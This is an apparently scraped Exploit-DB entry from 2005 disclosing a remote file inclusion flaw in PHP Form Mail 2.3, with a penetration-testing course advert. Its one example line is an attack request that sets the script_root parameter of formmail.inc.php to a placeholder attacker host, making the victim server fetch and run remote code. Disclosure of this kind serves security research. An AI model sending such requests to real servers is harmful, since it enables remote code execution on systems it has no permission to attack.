PHP Form Mail 2.3 - Arbitrary File Inclusion

EDB-ID:

857




Platform:

PHP

Date:

2005-03-05


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

Example:

 if register_globals=on and allow_url_fopen=on:
   http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://[hacker_box]/

# milw0rm.com [2005-03-05]